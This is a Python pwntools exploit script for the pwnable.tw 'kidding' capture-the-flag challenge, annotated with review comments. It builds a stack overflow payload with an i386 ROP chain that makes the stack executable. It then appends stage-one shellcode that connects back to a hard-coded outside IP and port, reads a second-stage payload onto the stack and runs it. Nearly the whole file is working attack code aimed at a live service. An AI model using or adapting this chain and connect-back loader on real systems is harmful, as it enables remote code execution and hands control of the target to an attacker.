import socket
import struct
import sys
import time

from pwn import *
# pwntools context for the 32-bit target; asm() in main() relies on arch='i386'.
context(os='linux', arch='i386', log_level='debug')

# Environment handed to the local process() and the libc object built from the
# same file.
# NOTE(review): the path is the 64-bit libc of the secret_of_heart challenge
# while this script targets an i386 binary (see the context above and the
# 0x08xxxxxx gadgets in main). A 32-bit process cannot preload an ELFCLASS64
# object, and `libc` is not referenced anywhere below, so both look like
# leftovers copied from another exploit - confirm before relying on them.
env = {
    "LD_PRELOAD": "/home/nghiadt/Desktop/pwnable.tw/secret_of_heart/libc_64.so.6",
}
libc = ELF(env["LD_PRELOAD"])
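def attach(listBp=None):
    """Attach gdb to the global target ``r`` with extra breakpoints.

    Args:
        listBp: addresses to break on, passed straight to createGDBScript().
            None (the default) means "no extra breakpoints"; a fresh list is
            created per call rather than sharing one mutable default object
            between calls.

    ``pie=False`` is hard-wired, matching the fixed 0x08xxxxxx gadget
    addresses main() uses for this binary.
    """
    if listBp is None:
        listBp = []
    gdb.attach(r, gdbscript=createGDBScript(listBp, pie=False))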
def createGDBScript(listBp, pie=False):
    """Build the gdb command script that attach() feeds to gdb.attach().

    Args:
        listBp: addresses to break on. With pie=True each breakpoint is
            emitted relative to ``$piebase`` after a ``codebase`` command;
            otherwise the addresses are used as absolute.
        pie: whether the target is position independent.

    Returns:
        The script text. Besides the caller's breakpoints it always adds a
        breakpoint at 0x80b8547 - one byte past the ``push esp ; ret`` gadget
        main() uses, presumably its ``ret`` - whose command list issues ``n``
        50 times (apparently to step through the first instructions run after
        control moves to the stack) and finally ``c`` to continue.
    """
    log.info("GDB script")
    parts = []
    if pie:
        parts.append("\ncodebase\n")
    bp_fmt = "b * $piebase + %s\n" if pie else "b * %s\n"
    parts.extend(bp_fmt % hex(addr) for addr in listBp)
    # Fixed breakpoint + command list; gdb ignores leading whitespace here.
    parts.append("\nb* 0x80b8547\ncommands\n")
    parts.append("n\n" * 50)
    parts.append("\nend\n")
    parts.append("c\n")
    return "".join(parts)
# Target selection: any extra argv entry means attack the live service,
# otherwise run ./kidding locally (ASLR on, environment from `env` above).
# `flag` records the choice for the rest of the script: 1 = remote, 0 = local.
flag = 1 if len(sys.argv) > 1 else 0
r = remote("chall.pwnable.tw", 10303) if flag else process("./kidding", aslr=True, env=env)
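def _rop_chain():
    """Return the i386 ROP chain that makes the stack executable and jumps into it.

    Gadgets (fixed addresses in this ./kidding build; they will not work on
    any other binary):
        0x0806ec8b  pop edx ; ret
        0x080b8536  pop eax ; ret
        0x0805462b  mov [edx], eax   (the chain continues past it, so it returns)
        0x080b8546  push esp ; ret
    """
    chain = b""
    # Step 1: write 7 to 0x080E9FEC via the mov [edx], eax gadget.
    # NOTE(review): 7 is PROT_READ|PROT_WRITE|PROT_EXEC and 0x080E9FEC is
    # presumably glibc's __stack_prot, which _dl_make_stack_executable applies
    # with mprotect - confirm the symbol in the binary.
    chain += p32(0x0806ec8b)  # pop edx ; ret
    chain += p32(0x080E9FEC)  # edx = address to write
    chain += p32(0x080b8536)  # pop eax ; ret
    chain += p32(0x7)         # eax = value written (RWX)
    chain += p32(0x0805462b)  # mov [edx], eax
    # Step 2: _dl_make_stack_executable with eax = &__libc_stack_end. The
    # pointer is loaded into eax before the call, i.e. the chain assumes this
    # internal glibc function takes its argument in a register - verify.
    chain += p32(0x080b8536)  # pop eax ; ret
    chain += p32(0x080E9FC8)  # __libc_stack_end
    chain += p32(0x0809A080)  # _dl_make_stack_executable
    # Step 3: returning into push esp ; ret transfers control to whatever
    # follows the chain on the stack - the shellcode main() appends.
    chain += p32(0x080b8546)  # push esp ; ret
    return chain


def _stage1_shellcode(host="149.28.129.46", port=11111):
    """Return the i386 stage-1 shellcode: connect back to host:port, read stage 2.

    Everything goes through int 0x80:
      1. socketcall(SYS_SOCKET=1, [AF_INET=2, SOCK_STREAM=1, eax]). The
         protocol argument is whatever eax holds on entry, and ``mov al, 0x66``
         only sets the low byte, so the code relies on eax being 0 there.
      2. socketcall(SYS_CONNECT=3, [fd, &sockaddr_in{2, port, host}, 16]).
      3. read(0, esp, esi): ``xchg al, bl`` turns the connect result into
         eax = 3 (SYS_read, assuming connect returned 0); stage 2 is read onto
         the stack and execution falls through into it.
         NOTE(review): the read uses fd 0 rather than the socket's return
         value, so this presumes the socket was assigned descriptor 0 (lower
         fds closed in the target), and esi is used as the length with no
         setup - confirm both against the binary.

    Args:
        host: dotted-quad IPv4 address of the listener. The default is the
            original hard-coded immediate 0x2e811c95 (= 149.28.129.46).
        port: TCP port of the listener. The default is the original
            ``pushw 0x672b`` (= 11111 in network byte order).

    Returns:
        Assembled bytes; the architecture comes from the global pwntools
        context (i386).

    The caller must point these at a host they control: the target will
    connect there and execute whatever it receives.
    """
    # `push imm32` / `pushw imm16` store the immediate little-endian, so the
    # sockaddr_in fields end up in network byte order when the immediate is
    # the little-endian decoding of inet_aton() / a big-endian port.
    ip_imm = struct.unpack("<I", socket.inet_aton(host))[0]
    port_imm = struct.unpack("<H", struct.pack(">H", port))[0]
    return asm('''
        push eax
        push 0x01
        push 0x02
        mov ecx, esp
        mov al, 0x66
        xor ebx, ebx
        mov bl, 0x01
        int 0x80
        mov bl, 0x3
        push 0x%x
        pushw 0x%x
        pushw 0x2
        mov ecx, esp
        push 0x10
        push ecx
        push eax
        mov al, 0x66
        mov ecx, esp
        int 0x80
        xchg al, bl
        xor ebx, ebx
        mov edx, esi
        mov ecx, esp
        int 0x80
    ''' % (ip_imm, port_imm))


def main():
    """Send the overflow payload to the target and hand over an interactive session.

    Payload layout: 12 bytes of filler up to the overwritten return address,
    then the ROP chain from _rop_chain() (stack made executable, jump to esp),
    then the connect-back stage-1 shellcode from _stage1_shellcode().
    Uses the module-level target ``r``.
    """
    # Bytes literals keep this correct on both Python 2 and Python 3 pwntools:
    # p32()/asm() return bytes on Python 3, where "" + bytes raises TypeError.
    payload = b"".ljust(12, b"A")
    payload += _rop_chain()
    payload += _stage1_shellcode()
    log.info("Length shellcode: " + str(len(payload)))
    r.send(payload)
    r.interactive()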
if __name__ == "__main__":
    # Entry point. Note that the target is already opened at import time by
    # the remote()/process() selection above; main() only builds and sends.
    main()